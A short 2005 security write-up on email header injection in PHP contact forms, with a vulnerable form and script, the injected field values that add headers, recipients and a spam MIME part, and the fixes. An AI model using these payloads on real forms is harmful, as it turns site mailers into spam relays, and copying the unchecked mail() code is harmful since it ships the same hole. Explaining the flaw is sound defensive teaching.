Sending spam through PHP/HTML forms


The Problem:


Usually normal PHP script for sending e-mail for request or feedback form looks like this:

---cut---------------------

<form method="post" action="contact.php">
        <p>Your name         :<br /><input type="text" name="name"    value="" /></p>
        <p>Mobile number     :<br /><input type="text" name="phone"   value="" /></p>
        <p>Mobile model      :<br /><input type="text" name="model"   value="" /></p>
        <p>Mobile network    :<br /><input type="text" name="network" value="" /></p>
        <p>E-mail address    :<br /><input type="text" name="email"   value="" /></p>
        <p>Your order number :<br /><input type="text" name="order"   value="" /></p>
        <p>When did you call :<br /><input type="text" name="date"    value="" /></p>
        <p>Country           :<br /><input type="text" name="country" value="" /></p>
        <p>Complaint         :<br /><input type="text" name="text"    value="" /></p>

        <p><input type="submit" value="Send Info" /></p>
</form>

---cut---------------------

the contact.php usually looks like this:

---cut---------------------

<?
        $s="

Problem Report:

Your name         : $name
Mobile number     : $phone
Mobile model      : $model
Mobile network    : $network
E-mail address    : $email
Your order number : $order
When did you call : $date
Country           : $country
Complaint         : $text

        ";

        mail("user@domain.kom", "PROBLEM REPORT", $s, "from: $email" );

?>
<p>Thank you for the feedback...</p>

---cut---------------------

In this case, we do not check anyting about the $email.

In such case, the attacker may use e-mail attachments in order to send spam.

Suppose, the hacker use modified form and send something like:

$email fileld : 

---cut---------------------
spam@spam.com
Content-Type: multipart/mixed; boundary=\"===============0129976066==\"
MIME-Version: 1.0
Subject: Modified_email_subject
To: additional_recepient@domain1.kom
From: spam@spam.com
---cut---------------------

then the hacker do e-mail attachment, and inserting the message in ANY of the other fields:

$order field :

---cut---------------------
xxxxxxxxx
--===============0129976066==
Content-Type: text/plain; charset=\"us-ascii\"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Spam here, buy something for 1 USD
--===============0129976066==--
xxxxxxxxx
---cut---------------------

Final e-mail may look like :

---cut---------------------
Date: Thu, 28 Jul 2005 00:06:15 -0500
Message-Id: <200507280506@domain.kom>
To: user@domain.kom
Subject: PROBLEM REPORT
from: spam@spam.com
Content-Type: multipart/mixed; boundary=\"===============0129976066==\"
MIME-Version: 1.0
Subject: Modified_email_subject
To: additional_recepient@domain1.kom
From: spam@spam.com

Your name               : aaaaaaaaaaaaaaaaaaaaaa
Mobile number           : aaaaaaaaaaaaaaaaaaaaaa
Mobile model            : aaaaaaaaaaaaaaaaaaaaaa
Mobile network          : aaaaaaaaaaaaaaaaaaaaaa
E-mail address          : aaaaaaaaaaaaaaaaaaaaaa
Your order number       : xxxxxxxxx
--===============0129976066==
Content-Type: text/plain; charset=\"us-ascii\"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Spam here, buy something for 1 USD.
--===============0129976066==--
xxxxxxxxxx
When did you call       : aaaaaaaaaaaaaaaaaaaaaa
Country                 : aaaaaaaaaaaaaaaaaaaaaa
Complaint               : aaaaaaaaaaaaaaaaaaaaaa
---cut---------------------

With yellow color you may see the "included" parts. In red typeface is shown the actual spam mail. If you play with multipart/alternative, you can do the e-mail clients to show only part/attachment you want, and to hide the others.

Please note that I actually did not tried this, but this may be basic idea.

In order to have working "solution" it must have more complicated "inserted" parts.


Solution:


Solution is same as for famous SQL injection - CHECK EVERYTHING USER ENTER in your code, or REMOVE ALL spaces, enters, new lines in parts you put in e-mail headers  :-)

There are one more solution - do not include ANYTHING that is received from the user into e-mail headers. Make the from address default - something like no_reply@domain.kom.


Nikolay Mihaylov
28.JUL.2005
[ www.traveljungle.de ] [ www.nmmm.nu ] [ www.e-nick.org ]